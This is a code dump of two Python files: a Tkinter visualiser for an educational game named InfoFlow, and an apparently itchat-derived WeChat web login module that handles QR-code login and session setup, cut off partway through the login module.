InfoFlow_Array_VIS_For_TK.py
|
import show_state_array
from InfoFlow import *
import tkinter as tk
from tkinter import font
from tkinter import N, S, W, E
from typing import List
import random
import time
from threading import Thread
def rgb2hex(r, g, b):
return "#%02x%02x%02x" % (r, g, b)
class Style:
color_background = "#373737"
color_foreground = "#8E8E8E"
color_text = "#E4E4E4"
color_border = "#373737"
font_name_default = "Helvetica"
font_size_title = 24
font_size_normal = 16
border_default = "ridge"
loaded_fonts = {}
@staticmethod
def get_font(name: str, size: int, bold: bool = False, italic: bool = False, underline: bool = False, overstrike: bool = False, nocache=False) -> "font.Font":
key = (name, size, bold, italic, underline, overstrike)
if key in Style.loaded_fonts:
return Style.loaded_fonts[key]
f = font.Font(family=name, size=size, weight="bold" if bold else "normal", slant="italic" if italic else "roman", underline=str(underline).lower(), overstrike=str(overstrike).lower())
if not nocache:
Style.loaded_fonts[key] = f
return f
class StateDisplay(tk.Frame):
def __init__(self, parent, width, height):
super().__init__(parent)
self.root = parent
self.width = width
self.height = height
# What our UI looks like
# -------------------------------------
# | | Round | |
# | |--------------| |
# | | | |
# | player | Game | All |
# | stats | View | Operators |
# | | | |
# |-----------------------------------|
# | State Describe |
# -------------------------------------
self.style(self.root, bg=Style.color_background)
# Player Info
self.frame_player_info = tk.LabelFrame(self.root, text=" Player Stats ", borderwidth=2, relief=Style.border_default, font=Style.get_font("Chiller", Style.font_size_title, bold=True),
bg=Style.color_background, fg=Style.color_text)
self.frame_player_info.grid(row=0, column=0, rowspan=2, columnspan=1, ipadx=4, ipady=4, padx=4, pady=4, sticky=N + S + W + E)
self.label_energy = tk.Label(self.frame_player_info, text="Energy: ", font=Style.get_font(Style.font_name_default, Style.font_size_normal, bold=True),
bg=Style.color_background, fg=Style.color_text)
self.label_energy.grid(row=0, column=0, sticky=W)
self.canvas_energy = self.style(tk.Canvas(self.frame_player_info, width=100, height=20, bg=Style.color_background),
hc=Style.color_border, ht=1)
self.canvas_energy.grid(row=0, column=1, sticky=W)
color_energy = rgb2hex(46, 204, 113)
self.rect_energy = self.canvas_energy.create_rectangle(0, 0, 100, 20, fill=color_energy, outline=color_energy)
# self.text_energy = self.canvas_energy.create_text(25, 10, text="100", font=Style.get_font("Helvetica", Style.font_size_normal, bold=True))
self.label_score = tk.Label(self.frame_player_info, text="Score: ", bg=Style.color_background, fg=Style.color_text,
font=Style.get_font(Style.font_name_default, Style.font_size_normal, bold=True))
self.label_score.grid(row=1, column=0, sticky=W)
self.text_score = tk.Label(self.frame_player_info, font=Style.get_font(Style.font_name_default, Style.font_size_normal), bg=Style.color_background, fg=Style.color_text)
self.text_score.grid(row=1, column=1, sticky=W)
self.label_finished = tk.Label(self.frame_player_info, text="Finished Challenges: ", font=Style.get_font(Style.font_name_default, Style.font_size_normal, bold=True),
bg=Style.color_background, fg=Style.color_text)
self.label_finished.grid(row=2, column=0, sticky=W)
self.text_finished = tk.Label(self.frame_player_info, font=Style.get_font(Style.font_name_default, Style.font_size_normal), bg=Style.color_background, fg=Style.color_text)
self.text_finished.grid(row=2, column=1, sticky=W)
self.label_money = tk.Label(self.frame_player_info, text="Money/Debt: ", font=Style.get_font(Style.font_name_default, Style.font_size_normal, bold=True),
bg=Style.color_background, fg=Style.color_text)
self.label_money.grid(row=3, column=0, sticky=W)
self.text_money = tk.Label(self.frame_player_info, font=Style.get_font(Style.font_name_default, Style.font_size_normal), bg=Style.color_background, fg=Style.color_text)
self.text_money.grid(row=3, column=1, sticky=W)
self.label_difficulty_level = tk.Label(self.frame_player_info, text="Difficulty Level: ", font=Style.get_font(Style.font_name_default, Style.font_size_normal, bold=True),
bg=Style.color_background, fg=Style.color_text)
self.label_difficulty_level.grid(row=4, column=0, sticky=W)
self.text_difficulty_level = tk.Label(self.frame_player_info, font=Style.get_font(Style.font_name_default, Style.font_size_normal), bg=Style.color_background, fg=Style.color_text)
self.text_difficulty_level.grid(row=4, column=1, sticky=W)
self.label_accepted = tk.Label(self.frame_player_info, text="Has accepted challenge: ", font=Style.get_font(Style.font_name_default, Style.font_size_normal, bold=True),
bg=Style.color_background, fg=Style.color_text)
self.label_accepted.grid(row=5, column=0, sticky=W)
self.text_accepted = tk.Label(self.frame_player_info, font=Style.get_font(Style.font_name_default, Style.font_size_normal), bg=Style.color_background, fg=Style.color_text)
self.text_accepted.grid(row=5, column=1, sticky=W)
# Game Frame
self.label_round = tk.Label(self.root, text="\nRound Beginning", bg=Style.color_background, fg=Style.color_text, font=Style.get_font("Algerian", Style.font_size_normal))
self.label_round.grid(row=0, column=1, padx=4, pady=4, sticky=N + S + W + E)
self.frame_game = tk.LabelFrame(self.root, text=" Game View ", bg=Style.color_background, fg=Style.color_text,
relief=Style.border_default, font=Style.get_font("Chiller", Style.font_size_title, bold=True))
self.frame_game.grid(row=1, column=1, ipadx=2, ipady=2, padx=8, pady=12)
self.canvas_game = self.style(tk.Canvas(self.frame_game, width=600, height=400, bg=Style.color_background),
hc=Style.color_border, ht=0)
self.canvas_game.grid(row=0, column=0)
# Operators
self.frame_operators = self.style(tk.LabelFrame(self.root, text=" Operators ", borderwidth=2, relief=Style.border_default, font=Style.get_font("Chiller", Style.font_size_title, bold=True)),
bg=Style.color_background, fg=Style.color_text)
self.frame_operators.grid(row=0, column=2, rowspan=2, columnspan=1, ipadx=4, ipady=4, padx=4, pady=4, sticky=N + S + W + E)
self.list_operators = self.style(tk.Listbox(self.frame_operators, width=30, font=Style.get_font(Style.font_name_default, Style.font_size_normal),
bg=Style.color_background, fg=Style.color_text, borderwidth=0, selectmode=tk.SINGLE,
selectbackground=Style.color_foreground, selectforeground=Style.color_background),
hc=Style.color_border, ht=0)
self.list_operators.grid(row=0, column=0, padx=4, pady=4)
# Label for describing states
self.frame_state_describe = tk.LabelFrame(self.root, text=" Current State Description ", borderwidth=2, relief=Style.border_default,
font=Style.get_font("Chiller", Style.font_size_title, bold=True), bg=Style.color_background, fg=Style.color_text)
self.frame_state_describe.grid(row=2, column=0, columnspan=3, padx=4, pady=4, ipadx=4, ipady=4, sticky=N + S + W + E)
self.label_state_describe = tk.Label(self.frame_state_describe, font=Style.get_font("Consolas", Style.font_size_normal),
bg=Style.color_background, fg=Style.color_text, justify=tk.CENTER, anchor=N + W, wraplength=1400)
self.label_state_describe.pack(expand=True)
# set grid auto expand
self.grid_auto_expand(parent, 2, 2, row_weights=[0, 0, 1], col_weights=[0, 1, 0])
self.grid_auto_expand(self.frame_player_info, 6, 2, row_weights=[0 for _ in range(6)], col_weights=[0, 0])
@staticmethod
def style(w, hc=None, ht=None, **options):
w.configure(**options)
if hc and ht:
w.configure(highlightcolor=hc, highlightbackground=hc, highlightthickness=ht)
elif hc:
w.configure(highlightcolor=hc, highlightbackground=hc)
elif ht:
w.configure(highlightthickness=ht)
return w
@staticmethod
def set_text(w: 'tk.Text', text: str):
w.configure(state=tk.NORMAL)
w.delete(1.0, tk.END)
w.insert(tk.END, text)
w.configure(state=tk.DISABLED)
@staticmethod
def grid_auto_expand(frame: 'tk.Frame', row: int, col: int, row_weights: 'List[int]' = None, col_weights: 'List[int]' = None) -> None:
for i in range(row):
tk.Grid.rowconfigure(frame, i, weight=row_weights[i] if row_weights else 1)
for i in range(col):
tk.Grid.columnconfigure(frame, i, weight=col_weights[i] if col_weights else 1)
def initialize_tk(width, height, title):
root = tk.Tk()
root.title(title)
display = StateDisplay(root, width=width, height=height)
root.minsize(1100, 590)
show_state_array.STATE_WINDOW = display
print("VIS initialization finished")
class StateRenderer:
def init(self, display: 'StateDisplay', state: 'State'):
pass
def is_static_renderer(self):
return True
def render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
display.label_state_describe.configure(text=state.describe_state())
# Draw player stats
if state.player:
display.canvas_energy.coords(display.rect_energy, 0, 0, state.player.energy, 20)
# display.canvas_energy.itemconfigure(display.text_energy, text=f"{state.player.energy:3}", fill="white" if state.player.energy < 30 else "black")
display.text_score.configure(text=f"{state.player.score}")
display.text_finished.configure(text=f"{state.player.finished}")
display.text_money.configure(text=f"${state.player.money}/${state.player.debt}")
display.text_difficulty_level.configure(text=f"{state.player.difficulty_level}")
display.text_accepted.configure(text=f"{'✔' if state.player.has_accepted_challenge() else '×'}")
# Update round information
display.label_round.configure(text=f"\nRound {state.round}")
# Draw available operators
global OPERATORS
display.list_operators.delete(0, tk.END)
if OPERATORS:
ops = [(ind, op) for ind, op in enumerate(OPERATORS) if state.is_applicable_operator(op)]
for ind, op in ops:
display.list_operators.insert(tk.END, f"{ind:2}: {op.name}")
def dynamic_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
pass
def is_static_post_renderer(self):
return True
def post_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
pass
def post_dynamic_render(self, display: 'StateDisplay', state: 'State', last_state: 'State') -> bool:
# Return True if has more dynamic render; otherwise, return False
return False
@staticmethod
def get_renderer(state_type) -> 'StateRenderer':
if state_type in StateRenderer.all:
return StateRenderer.all[state_type]()
else:
raise TypeError(state_type)
class GameStartStateRenderer(StateRenderer):
class Rain:
def __init__(self, content: List[str], x: int, y: int, speed: float, size: int, color: str):
# self.text = "\n".join(content)
self.text = "".join(content)
self.x = x
self.y = y
self.speed = speed
self.size = size
self.color = color
def is_disappeared(self):
if self.speed > 0:
return self.x > 650
else:
return self.x < -300
@staticmethod
def random() -> 'GameStartStateRenderer.Rain':
            x, speed = (random.randint(-800, -500), random.random() * 32 + 2) if random.randint(0, 1) == 0 else (600 + random.randint(500, 800), -(random.random() * 32 + 2))
return GameStartStateRenderer.Rain(content=random.choices(population=["0", "1", "0", "1", "0", "1", "0", "1"], k=random.randint(6, 18)),
# x=random.randint(-10, 590), y=random.randint(-500, -300), speed=random.random() * 32 + 2,
x=x, y=random.randint(-10, 390), speed=speed,
size=random.randint(4, 24), color=Style.color_text)
def init(self, display, state):
self.rect_outer = display.canvas_game.create_rectangle(180, 130, 420, 270, width=4, fill=Style.color_text, outline=Style.color_text)
self.rect_inner = display.canvas_game.create_rectangle(184, 134, 416, 266, width=2, fill=Style.color_text, outline=Style.color_background)
self.font_title = Style.get_font("Gill Sans MT", 40, True, nocache=True)
self.text_title = display.canvas_game.create_text(300, 200, text="Info Flow", fill=Style.color_background, font=self.font_title)
self.rains = [GameStartStateRenderer.Rain.random() for _ in range(40)]
self.text_rains = []
for r in self.rains:
self.text_rains.append(display.canvas_game.create_text(r.x, r.y, anchor=tk.NW, font=Style.get_font("Consolas", r.size), text=r.text, fill=r.color))
def is_static_renderer(self):
return False
def render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
super().render(display, state, last_state)
def dynamic_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
rains, text_rains = self.rains[:], self.text_rains[:]
for i in range(len(rains)):
r, t = rains[i], text_rains[i]
r.x += r.speed
if display:
display.canvas_game.move(t, r.speed, 0)
if r.is_disappeared() and r in rains:
if display:
display.canvas_game.delete(t)
rains.remove(r)
text_rains.remove(t)
nr = GameStartStateRenderer.Rain.random()
rains.append(nr)
text_rains.append(display.canvas_game.create_text(nr.x, nr.y, anchor=tk.NW, font=Style.get_font("Consolas", nr.size), text=nr.text, fill=nr.color))
self.rains, self.text_rains = rains, text_rains
def is_static_post_renderer(self):
return False
def post_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
self.offset_outer = [0, 0, 0, 0]
self.offset_inner = [0, 0, 0, 0]
self.offset_size_title = 0
def post_dynamic_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
self.offset_outer = [i + 20 for i in self.offset_outer]
self.offset_inner = [i + 20 for i in self.offset_inner]
self.offset_size_title += 6
self.font_title.configure(size=28 + self.offset_size_title)
display.canvas_game.coords(self.rect_outer, 200 - self.offset_outer[0], 150 - self.offset_outer[1], 400 + self.offset_outer[2], 250 + self.offset_outer[3])
display.canvas_game.coords(self.rect_inner, 204 - self.offset_outer[0], 154 - self.offset_outer[1], 396 + self.offset_outer[2], 246 + self.offset_outer[3])
display.canvas_game.itemconfigure(self.text_title, font=self.font_title)
return False if self.offset_size_title >= 60 else True
class ChallengeMenuStateRenderer(StateRenderer):
def init(self, display, state):
self.c_menus = [[i * 100 + 50, 100 + 50 * i, random.randint(0, 50), random.randint(0, 10), .5, .5] for i in range(4)]
self.font = Style.get_font(Style.font_name_default, 28, italic=True)
self.label_accept = display.canvas_game.create_text(self.c_menus[0][0], self.c_menus[0][1], anchor=W,
text=OperatorIds.CHALLENGE_ACCEPT.value, fill=Style.color_text, font=self.font)
self.label_decline = display.canvas_game.create_text(self.c_menus[1][0], self.c_menus[1][1], anchor=W,
text=OperatorIds.CHALLENGE_DECLINE.value, fill=Style.color_text, font=self.font)
self.label_pay = display.canvas_game.create_text(self.c_menus[2][0], self.c_menus[2][1], anchor=W,
text=OperatorIds.PAY_DEBT.value, fill=Style.color_text, font=self.font)
self.label_finish_round = display.canvas_game.create_text(self.c_menus[3][0], self.c_menus[3][1], anchor=W,
text=OperatorIds.FINISH_ROUND.value, fill=Style.color_text, font=self.font)
def is_static_renderer(self):
return False
def render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
super().render(display, state, last_state)
def dynamic_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
for t in self.c_menus:
x, y, off_x, off_y, s_x, s_y = t
t[0], t[1], t[2], t[3] = x + s_x, y + s_y, off_x + s_x, off_y + s_y
if t[2] <= 0 or t[2] >= 50:
t[4] = -t[4]
if t[3] <= 0 or t[3] >= 10:
t[5] = -t[5]
display.canvas_game.coords(self.label_accept, self.c_menus[0][0], self.c_menus[0][1])
display.canvas_game.coords(self.label_decline, self.c_menus[1][0], self.c_menus[1][1])
display.canvas_game.coords(self.label_pay, self.c_menus[2][0], self.c_menus[2][1])
display.canvas_game.coords(self.label_finish_round, self.c_menus[3][0], self.c_menus[3][1])
def is_static_post_renderer(self):
return False
def post_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
if last_state.selected_operator.id is OperatorIds.CHALLENGE_ACCEPT:
self.pos_select = self.c_menus[0]
self.text_select = self.label_accept
elif last_state.selected_operator.id is OperatorIds.CHALLENGE_DECLINE:
self.pos_select = self.c_menus[1]
self.text_select = self.label_decline
elif last_state.selected_operator.id is OperatorIds.PAY_DEBT:
self.pos_select = self.c_menus[2]
self.text_select = self.label_pay
elif last_state.selected_operator.id is OperatorIds.FINISH_ROUND:
self.pos_select = self.c_menus[3]
self.text_select = self.label_finish_round
self.size_select = 28
self.font_select = Style.get_font(Style.font_name_default, self.size_select, bold=True, italic=True, nocache=True)
def post_dynamic_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
if self.size_select < 44:
display.canvas_game.itemconfigure(self.text_select, font=self.font_select)
self.font_select.configure(size=self.size_select + 2)
self.size_select += 8
return True
elif self.pos_select[0] < 650:
display.canvas_game.coords(self.text_select, self.pos_select[0], self.pos_select[1])
self.pos_select[0] += 60
return True
else:
return False
class MessageDisplayStateRenderer(StateRenderer):
def init(self, display, state):
pass
def render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
super().render(display, state, last_state)
if state.show_title:
# display.canvas_game.create_oval(70, 50, 100, 80, fill=Style.color_text, outline=Style.color_text)
# display.canvas_game.create_oval(72, 52, 98, 78, fill=Style.color_background, outline=Style.color_text)
# display.canvas_game.create_text(85, 65, text="i", fill=Style.color_text, font=Style.get_font("Impact", 18, bold=True))
display.canvas_game.create_text(45, 35, text=state.title, fill=Style.color_text, font=Style.get_font(Style.font_name_default, Style.font_size_title, bold=True),
anchor=tk.W, width=500)
display.canvas_game.create_text(50, 60, text=state.info, fill=Style.color_text,
font=Style.get_font(Style.font_name_default,
Style.font_size_normal if len(state.info.split(". ") + state.info.split("\n")) < 8 else Style.font_size_normal - 2),
anchor=tk.NW, width=500)
if not state.show_title:
display.canvas_game.create_text(50, 50, text=state.info, fill=Style.color_text,
font=Style.get_font(Style.font_name_default,
Style.font_size_normal if len(state.info.split(". ") + state.info.split("\n")) < 8 else Style.font_size_normal - 2),
anchor=tk.NW, width=500)
class NewsSortingChallengeStateRenderer(StateRenderer):
def init(self, display, state):
pass
def render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
super().render(display, state, last_state)
display.canvas_game.create_text(300, 200, text=f"News: {state.player.current_challenge.to_sort[state.news_index]}", fill=Style.color_text,
font=Style.get_font(Style.font_name_default, 40), width=550)
class MythBusterChallengeStateRenderer(StateRenderer):
def init(self, display, state):
pass
def render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
super().render(display, state, last_state)
display.canvas_game.create_text(300, 200, text=f"Statement: {state.player.current_challenge.myths[state.myth_index]}", fill=Style.color_text,
font=Style.get_font(Style.font_name_default, 40), width=550)
def is_static_post_renderer(self):
return False
def post_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
if last_state.selected_operator.id is MythBusterChallenge.provided_ops[0].id:
self.content_seal = "FACT"
elif last_state.selected_operator.id is MythBusterChallenge.provided_ops[1].id:
self.content_seal = "MYTH"
else:
self.content_seal = None
if self.content_seal:
self.rect_seal = display.canvas_game.create_oval(300, 200, 500, 280, fill="red", outline="red")
self.font_seal = Style.get_font("Arial", 40, True, nocache=True)
self.font_size = 40
self.text_seal = display.canvas_game.create_text(400, 240, text=self.content_seal, fill=Style.color_foreground, font=self.font_seal)
self.size_outline = 1
def post_dynamic_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
if self.content_seal:
display.canvas_game.itemconfigure(self.rect_seal, width=self.size_outline)
self.size_outline += 1
self.font_size += 2
self.font_seal.configure(size=self.font_size)
            return self.size_outline != 10
else:
return False
class InstantMemChallengeStateRenderer(StateRenderer):
def init(self, display, state):
pass
def render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
super().render(display, state, last_state)
        if state.phase_index == 0:
display.canvas_game.create_text(300, 200, text=f"{state.describe_state()}", fill=Style.color_text,
font=Style.get_font(Style.font_name_default, 20), width=550)
        elif state.phase_index == 1:
display.canvas_game.create_text(50, 50, text=f"{state.describe_state()}", fill=Style.color_text,
anchor=tk.NW,
font=Style.get_font(Style.font_name_default, 20), width=550)
class MinerChallengeStateRenderer(StateRenderer):
def init(self, display, state):
pass
def render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
super().render(display, state, last_state)
self.font_text = Style.get_font(Style.font_name_default, 12, bold=True)
padx = 25
pady = 25
x0 = 0
y0 = 25
map_size = state.player.current_challenge.map_size
self.cell_width = (600 - padx * 2) / map_size
self.cell_height = (400 - pady * 2) / map_size
display.canvas_game.create_text(300, 10, text="Get to the destination, try to get useful information as much as you can, and avoid trash information!",
font=self.font_text, fill=Style.color_text, width=550, anchor=N, justify=tk.CENTER)
for y in range(map_size):
for x in range(map_size):
c = state.player.current_challenge.map[y][x]
                color = None if c == 0 else "#AA0000" if c == 1 else "green" if c == 2 else "blue" if c == 4 else "brown" if c == 5 else "black"
                text = "" if c == 0 else "Trash" if c == 1 else "Info" if c == 2 else "Player" if c == 4 else "Goal" if c == 5 else ""
display.canvas_game.create_rectangle(x0 + padx + x * self.cell_width, y0 + pady + y * self.cell_height,
x0 + padx + (x + 1) * self.cell_width, y0 + pady + (y + 1) * self.cell_height,
fill=color, outline=Style.color_foreground)
display.canvas_game.create_text(x0 + padx + (x + 0.5) * self.cell_width, y0 + pady + (y + 0.5) * self.cell_height,
fill=Style.color_text, text=text, font=self.font_text)
self.cell_player = display.canvas_game.create_rectangle(x0 + padx + state.player.current_challenge.x * self.cell_width,
y0 + pady + state.player.current_challenge.y * self.cell_height,
x0 + padx + (state.player.current_challenge.x + 1) * self.cell_width,
y0 + pady + (state.player.current_challenge.y + 1) * self.cell_height,
fill="blue", outline=Style.color_foreground)
StateRenderer.all = {
GameStartState: lambda: GameStartStateRenderer(),
ChallengeMenuState: lambda: ChallengeMenuStateRenderer(),
MessageDisplayState: lambda: MessageDisplayStateRenderer(),
NewsSortingChallengeState: lambda: NewsSortingChallengeStateRenderer(),
MythBusterChallengeState: lambda: MythBusterChallengeStateRenderer(),
InstantMemChallengeState: lambda: InstantMemChallengeStateRenderer(),
MinerChallengeState: lambda: MinerChallengeStateRenderer()
}
def initialize_vis():
initialize_tk(width=1200, height=800, title="InfoFlow")
StateRenderer.last_state: 'State' = None
keep_render: bool = False
renderer: 'StateRenderer' = None
in_render_state = False
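# Called for every new game state: wait for any render already in progress, play the previous
# renderer's post-render animation for the operator that was just selected, clear the canvas,
# then run the new state's static/dynamic rendering on a daemon thread so the game loop is
# not blocked.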
def render_state(state: 'State'):
# print("In render_state, state is " + str(state)) # DEBUG ONLY
global in_render_state
while in_render_state:
time.sleep(0.1)
in_render_state = True
global keep_render, renderer
keep_render = False
if StateRenderer.last_state and StateRenderer.last_state.selected_operator and renderer:
if show_state_array.STATE_WINDOW:
renderer.post_render(show_state_array.STATE_WINDOW, state, StateRenderer.last_state)
if not renderer.is_static_post_renderer():
keep_post_render = True
while show_state_array.STATE_WINDOW and keep_post_render:
keep_post_render = renderer.post_dynamic_render(show_state_array.STATE_WINDOW, state, StateRenderer.last_state)
show_state_array.STATE_WINDOW.root.update()
time.sleep(.05)
state.selected_operator = None
show_state_array.STATE_WINDOW.canvas_game.delete(tk.ALL)
def render():
global in_render_state, renderer
renderer = StateRenderer.get_renderer(type(state))
renderer.init(show_state_array.STATE_WINDOW, state)
in_render_state = False
if show_state_array.STATE_WINDOW:
renderer.render(show_state_array.STATE_WINDOW, state, StateRenderer.last_state)
if not renderer.is_static_renderer():
while show_state_array.STATE_WINDOW and keep_render:
renderer.dynamic_render(show_state_array.STATE_WINDOW, state, StateRenderer.last_state)
time.sleep(.05)
keep_render = True
    t = Thread(target=render)
    t.daemon = True
t.start()
# StateRenderer.get_renderer(type(state)).render(show_state_array.STATE_WINDOW, state, StateRenderer.last_state)
StateRenderer.last_state = state
|
login.py
|
import os, sys, time, re, io
import threading
import json, xml.dom.minidom
import copy, pickle, random
import traceback, logging
try:
from httplib import BadStatusLine
except ImportError:
from http.client import BadStatusLine
import requests
from pyqrcode import QRCode
from .. import config, utils
from ..returnvalues import ReturnValue
from ..storage.templates import wrap_user_dict
from .contact import update_local_chatrooms, update_local_friends
from .messages import produce_msg
logger = logging.getLogger('itchat')
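# Attach the login-related functions defined in this module as methods of the itchat core object.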
def load_login(core):
core.login = login
core.get_QRuuid = get_QRuuid
core.get_QR = get_QR
core.check_login = check_login
core.web_init = web_init
core.show_mobile_login = show_mobile_login
core.start_receiving = start_receiving
core.get_msg = get_msg
core.logout = logout
def login(self, enableCmdQR=False, picDir=None, qrCallback=None,
loginCallback=None, exitCallback=None):
if self.alive or self.isLogging:
logger.warning('itchat has already logged in.')
return
self.isLogging = True
while self.isLogging:
uuid = push_login(self)
if uuid:
qrStorage = io.BytesIO()
else:
logger.info('Getting uuid of QR code.')
while not self.get_QRuuid():
time.sleep(1)
logger.info('Downloading QR code.')
qrStorage = self.get_QR(enableCmdQR=enableCmdQR,
picDir=picDir, qrCallback=qrCallback)
logger.info('Please scan the QR code to log in.')
isLoggedIn = False
while not isLoggedIn:
status = self.check_login()
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=self.uuid, status=status, qrcode=qrStorage.getvalue())
if status == '200':
isLoggedIn = True
elif status == '201':
if isLoggedIn is not None:
logger.info('Please press confirm on your phone.')
isLoggedIn = None
elif status != '408':
break
if isLoggedIn:
break
elif self.isLogging:
logger.info('Log in time out, reloading QR code.')
else:
return # log in process is stopped by user
logger.info('Loading the contact, this may take a little while.')
self.web_init()
self.show_mobile_login()
self.get_contact(True)
if hasattr(loginCallback, '__call__'):
r = loginCallback()
else:
utils.clear_screen()
if os.path.exists(picDir or config.DEFAULT_QR):
os.remove(picDir or config.DEFAULT_QR)
logger.info('Login successfully as %s' % self.storageClass.nickName)
self.start_receiving(exitCallback)
self.isLogging = False
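# Push login: if a wxuin cookie from an earlier session is still present, request a fresh uuid
# so the user may only need to confirm on the phone instead of scanning a new QR code.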
def push_login(core):
cookiesDict = core.s.cookies.get_dict()
if 'wxuin' in cookiesDict:
url = '%s/cgi-bin/mmwebwx-bin/webwxpushloginurl?uin=%s' % (
config.BASE_URL, cookiesDict['wxuin'])
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(url, headers=headers).json()
if 'uuid' in r and r.get('ret') in (0, '0'):
core.uuid = r['uuid']
return r['uuid']
return False
def get_QRuuid(self):
url = '%s/jslogin' % config.BASE_URL
params = {
'appid' : 'wx782c26e4c19acffb',
'fun' : 'new', }
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
self.uuid = data.group(2)
return self.uuid
def get_QR(self, uuid=None, enableCmdQR=False, picDir=None, qrCallback=None):
uuid = uuid or self.uuid
picDir = picDir or config.DEFAULT_QR
qrStorage = io.BytesIO()
qrCode = QRCode('https://login.weixin.qq.com/l/' + uuid)
qrCode.png(qrStorage, scale=10)
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=uuid, status='0', qrcode=qrStorage.getvalue())
else:
if enableCmdQR:
utils.print_cmd_qr(qrCode.text(1), enableCmdQR=enableCmdQR)
else:
with open(picDir, 'wb') as f:
f.write(qrStorage.getvalue())
utils.print_qr(picDir)
return qrStorage
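# Poll the login endpoint for the current uuid: '200' means the scan was confirmed and the
# redirect info was processed successfully, '201' means scanned but not yet confirmed,
# '408' means still waiting; anything else is treated as a failure.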
def check_login(self, uuid=None):
uuid = uuid or self.uuid
url = '%s/cgi-bin/mmwebwx-bin/login' % config.BASE_URL
localTime = int(time.time())
params = 'loginicon=true&uuid=%s&tip=1&r=%s&_=%s' % (
uuid, int(-localTime / 1579), localTime)
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.code=(\d+)'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
if process_login_info(self, r.text):
return '200'
else:
return '400'
elif data:
return data.group(1)
else:
return '400'
def process_login_info(core, loginContent):
''' when finish login (scanning qrcode)
* syncUrl and fileUploadingUrl will be fetched
* deviceid and msgid will be generated
* skey, wxsid, wxuin, pass_ticket will be fetched
'''
regx = r'window.redirect_uri="(\S+)";'
core.loginInfo['url'] = re.search(regx, loginContent).group(1)
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(core.loginInfo['url'], headers=headers, allow_redirects=False)
core.loginInfo['url'] = core.loginInfo['url'][:core.loginInfo['url'].rfind('/')]
for indexUrl, detailedUrl in (
("wx2.qq.com" , ("file.wx2.qq.com", "webpush.wx2.qq.com")),
("wx8.qq.com" , ("file.wx8.qq.com", "webpush.wx8.qq.com")),
("qq.com" , ("file.wx.qq.com", "webpush.wx.qq.com")),
("web2.wechat.com" , ("file.web2.wechat.com", "webpush.web2.wechat.com")),
("wechat.com" , ("file.web.wechat.com", "webpush.web.wechat.com"))):
fileUrl, syncUrl = ['https://%s/cgi-bin/mmwebwx-bin' % url for url in detailedUrl]
if indexUrl in core.loginInfo['url']:
core.loginInfo['fileUrl'], core.loginInfo['syncUrl'] = \
fileUrl, syncUrl
break
else:
core.loginInfo['fileUrl'] = core.loginInfo['syncUrl'] = core.loginInfo['url']
core.loginInfo['deviceid'] = 'e' + repr(random.random())[2:17]
core.loginInfo['BaseRequest'] = {}
for node in xml.dom.minidom.parseString(r.text).documentElement.childNodes:
if node.nodeName == 'skey':
core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = node.childNodes[0].data
elif node.nodeName == 'wxsid':
core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = node.childNodes[0].data
elif node.nodeName == 'wxuin':
core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = node.childNodes[0].data
if not all([key in core.loginInfo for key in ('skey', 'wxsid', 'wxuin', 'pass_ticket')]):
logger.error('Your wechat account may be LIMITED to log in WEB wechat, error info:\n%s' % r.text)
core.isLogging = False
return False
return True
def web_init(self):
url = '%s/webwxinit' % self.loginInfo['url']
params = {
'r': int(-time.time() / 1579),
'pass_ticket': self.loginInfo['pass_ticket'], }
data = { 'BaseRequest': self.loginInfo['BaseRequest'], }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, params=params, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
# deal with login info
utils.emoji_formatter(dic['User'], 'NickName')
self.loginInfo['InviteStartCount'] = int(dic['InviteStartCount'])
self.loginInfo['User'] = wrap_user_dict(utils.struct_friend_info(dic['User']))
self.memberList.append(self.loginInfo['User'])
self.loginInfo['SyncKey'] = dic['SyncKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncKey']['List']])
self.storageClass.userName = dic['User']['UserName']
self.storageClass.nickName = dic['User']['NickName']
# deal with contact list returned when init
contactList = dic.get('ContactList', [])
chatroomList, otherList = [], []
for m in contactList:
if m['Sex'] != 0:
otherList.append(m)
elif '@@' in m['UserName']:
m['MemberList'] = [] # don't let dirty info pollute the list
chatroomList.append(m)
elif '@' in m['UserName']:
# mp will be dealt in update_local_friends as well
otherList.append(m)
if chatroomList:
update_local_chatrooms(self, chatroomList)
if otherList:
update_local_friends(self, otherList)
return dic
def show_mobile_login(self):
url = '%s/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'Code' : 3,
